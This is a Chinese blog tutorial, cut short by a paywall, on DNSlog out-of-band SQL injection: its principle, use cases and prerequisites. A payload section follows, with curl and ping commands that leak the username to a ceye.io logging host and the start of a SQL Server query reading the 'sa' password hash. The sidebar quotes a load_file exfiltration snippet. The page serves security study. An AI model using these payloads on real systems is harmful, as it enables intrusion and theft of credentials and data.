WEB安全之:DNSlog SQL 注入

最新推荐文章于 2024-03-22 21:12:44 发布
最新推荐文章于 2024-03-22 21:12:44 发布
阅读量201 收藏 1
点赞数
分类专栏: Metasploit 文章标签: 数据库 安全 DNSlog注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/f_carey/article/details/118024967
版权
本文详细介绍了DNSlog SQL注入的原理,利用场景,前提条件,涉及的平台及Payloads示例。当WEB应用存在SQL注入但无明显回显时,DNSlog注入提供了一种有效验证和提取数据的方式。内容涵盖*nix和Windows的命令执行,不同数据库系统的SQL注入,以及Struts2、FFMpeg等应用的安全风险。
摘要由CSDN通过智能技术生成

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

SQL 注入之:DNSlog 注入

1 原理

  • DNSlog 就是存储在 DNS 服务器上的域名解析记录,DNSlog 记录着浏览器对域名访问的信息,利用 DNSlog 能读取多级域名的解析日志,获取信息。
  • 发起带有查询语句 DNS 查询请求,通过 DNS 请求查询到值,组合成三级域名,在 NS 服务器 DNS 的日志中显示出来。

2 利用场景

  • 当 WEB 应用程序存在 SQL 注入漏洞时,页面无回显,在读取文件、执行命令注入等操作时无法明显的确认是否利用成功
  • 利用盲注二分法、布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截甚至会被封 IP;
  • 此时利用 DNSlog 注入,把请求的内容外带出来,通过查询 DNSlog 得到想要的结果。

3 前提条件

  • 拥有一台 DNSlog 服务器
  • 目标主机能够访问互联网
  • 用户具有文件读写权限
  • 可以使用 union 查询
  • 知道要读文件的绝对路径
    (1)查询用户的文件权限

4 平台

5 Payloads

ceye 网站中的 payloads 示例

CEYE平台的使用-更为详细的示例)

0x00 命令执行

i. *nix:

curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io

ii. windows

ping %USERNAME%.b182oj.ceye.io

0x01 SQL Injection

i. SQL Server

DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa'
最低0.47元/天 解锁文章
f_carey
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 331
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
dnslogsql注入
weixin_44894463的博客
07-09 227
前两天看到了一个骚姿势,没有回显的时候利用dnslog来得到数据库名等。 可以在一个网站上注册ceye.io,注册就可以得到一个二级域名。 用到了load_file() ,用法是load_file(文件名),比如这样:select load_file(concat(’\\’,database(),’.xxxx.ceye.io\fwafw’)); 这个就相当于访问了table_schema.xxx...
DnslogSQL注入中的利用
weixin_33754913的博客
07-11 313
参考文献:www.anquanke.com/post/id/98096https://bbs.pediy.com/thread-223881.htm DNSlogWeb攻击的利用 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过DNSlog把想获得的数据外带出来。 常用...
SQL注入DNSlog注入
zh的博客
10-12 826
靶场地址:http://61.136.208.14:8003/ 解题准备:DNSlog平台 解题思路: 1、根据提示,需要使用dnslog平台进行注入 DNSLog Platform 生成并复制域名 2、然后判断靶场的闭合符 id=1 页面正常 id=1' id=1' --+ 报错 id=1 and 1=1 页面正常 id=1 and 1=2 页面不正常 确定没有闭合符,应该是数字型 根据DNSlog注入的通用语句,构建注入语句 ?id=1 and (select load_
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 717
SQL注入——DNSlog注入
Web应用安全:使用SQL注入绕过认证.pptx
06-17
Web应用安全领域中,SQL注入是一种常见的攻击手段,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。在这个主题中,我们将详细探讨如何使用SQL注入来绕过认证过程,主要关注两类注入——数字型...
Web安全SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
Web应用安全:使用SQL注入攻击篡改数据实验.doc
06-20
Web应用安全SQL注入攻击篡改数据】 SQL注入攻击是一种常见的网络安全威胁,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,以获取未经授权的数据访问或控制系统。本实验旨在让学生了解并实践SQL注入的...
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
Web应用安全领域中,SQL注入是一种常见的攻击手段,它允许恶意用户通过构造特定的SQL语句,绕过系统的身份验证,获取或修改数据库中的敏感信息。以下是对"使用SQL注入绕过认证"实验的详细说明: 一、实验目的 1. ...
SQL DNSlog注入详解
永远是少年
08-07 1318
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL DNSlog注入。 一、SQL DNSlog注入简介 二、SQL DNSlog注入实战
DnslogSqlinj
05-10
DnslogSqlinj 具有ceye.io的DnsLog SQL注入工具 用法 Usage: dnslogSql.py [options] -u http://10.1.1.9/sqli-labs/Less-9/?id=1' and ({})--+ Options: --version show program's version number and exit -h, --help show this help message and exit -n TASKNAME, --name=TASKNAME task name -t THREAD_COUNT, --thread=THREAD_COUNT thread_count -
SQL注入DnsLog注入
qq_52310755的博客
03-22 1961
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL注入DNSlog方式
最新发布
m0_57347472的博客
03-22 253
DNSlog注入也可以称之为dns带外查询,Dns在域名解析时会在DNS服务器上留下域名和解析il的记录,可以在dns服务器上查询相应的dns解析记录,来获取大致原理。那么我们就可以通过只有的方式然后拼接数据库函数,通过DNSlog获得数据库的信息。http://ceye.io/ 知道创宇公司提供的。上图是创宇公司提供的的DNSlog服务器网址。修改limit的数字即可得到其他表名。DNSlog服务器无需自己搭建。此处的路径我们称之为UNC路径。
dnslogsql注入中的应用
whatday的专栏
07-23 700
目录 1.DNSLOG的原理 2.Dnslog在常见数据库SQL注入的实战 1、MySQL 2、msSQL 3、postgreSQL 4、Oracle 3.总结 1.DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时, DNS的解析过程示意图 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。
DnslogSQL注入中的实战
Hq_Dream的博客
01-20 3024
DnslogSQL注入中的实战 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于DnslogSQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了这个攻击方式,或者只是用某个简单的payload做了简单的验证。 本文主要讲述Dnslog这种攻击手法在SQL注入中的实战运用,虽然网上对于DnslogSQL注入方面运用的文章也不少。但是很多文章都只是片面的提到了...
SQL注入DNSLog外带注入
dragon的博客
02-21 2638
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
SQL注入-二次注入-dnslog注入
m0_52149675的博客
04-04 827
二次注入一般是用于白盒测试、黑盒测试就算是找到注入也没办法攻击。
SQL注入DNS_log注入
weixin_47785246的博客
07-11 742
SQL注入DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
SQL注入-DNSlog注入(手工加工具使用)
BING
04-17 6725
DNSlog注入
Web安全揭秘:SQL注入漏洞实战教程
本资源是一份关于Web安全SQL注入漏洞的详细教程——《注入攻击:Web安全SQL注入漏洞专题》的腾讯培训PPT讲义。该PPT主要针对初学者和安全专业人员,讲解了SQL注入攻击的手动操作方法和常用工具SqlMap的应用,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值